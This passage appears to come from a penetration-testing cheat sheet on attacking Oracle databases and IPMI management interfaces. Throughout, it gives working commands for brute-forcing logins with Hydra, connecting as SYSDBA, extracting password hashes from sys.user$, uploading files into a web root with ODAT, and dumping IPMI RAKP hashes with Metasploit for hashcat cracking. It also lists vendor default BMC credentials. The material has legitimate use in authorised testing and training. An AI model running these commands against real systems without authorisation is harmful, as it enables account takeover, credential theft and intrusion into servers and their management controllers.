Using Hydra. The oracle-listener module guesses the TNS listener password (relevant only to old listeners that still use one); database accounts are attacked with the oracle module, which takes the SID as its module option and requires hydra to be built with the Oracle client libraries:
hydra -L users.txt -P passwords.txt -m <SID> <IP> oracle
Connecting to Oracle Database
Using SQLPlus:
sqlplus <username>/<password>@<IP>/<SID>
Connecting as SYSDBA:
sqlplus <USERNAME>/<PASSWORD>@<TARGET_IP>/<DATABASE_SID> as sysdba
Enumerate Database Information
List databases:
SELECT name FROM v$database;
List tables in current database:
SELECT table_name FROM all_tables;
List user privileges:
SELECT * FROM user_role_privs;
Extract password hashes (requires SYSDBA; from 11g onward the PASSWORD column is empty and the hashes live in the SPARE4 column of the same table):
SELECT name, password FROM sys.user$;
Exploiting Oracle Database
Uploading a File to the Server
Upload a test file:
echo "Test Upload" > test.txt
./odat.py utlfile -s <IP> -d XE -U <username> -P <password> --sysdba --putFile C:\\inetpub\\wwwroot test.txt ./test.txt
Check if file upload was successful:
curl -X GET http://<IP>/test.txt
IPMI - Intelligent Platform Management Interface - Port 623
Scanning for IPMI Services
nmap -sU -p 623 --script ipmi-* <IP>
Using Metasploit:
use auxiliary/scanner/ipmi/ipmi_version
set rhosts <IP>
run
Default Credentials to Try
Product | Username | Password |
---|---|---|
Dell iDRAC | root | calvin |
HP iLO | Administrator | 8-character random string |
Supermicro IPMI | ADMIN | ADMIN |
Test IPMI Credentials
hydra has no IPMI module. Try the defaults from the table with ipmitool over RMCP+ (lanplus); a successful call lists the BMC's user accounts:
ipmitool -I lanplus -H <IP> -U <username> -P <password> user list
Dumping IPMI Password Hashes
Using Metasploit:
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts <IP>
run
Cracking IPMI Hashes with Hashcat
The RAKP exchange hands the client a salted HMAC-SHA1 of the password for any valid username, which is what ipmi_dumphashes collects (set OUTPUT_HASHCAT_FILE ipmi_hashes.txt to save it in hashcat format). Mode 7300 is IPMI2 RAKP HMAC-SHA1:
hashcat -m 7300 ipmi_hashes.txt rockyou.txt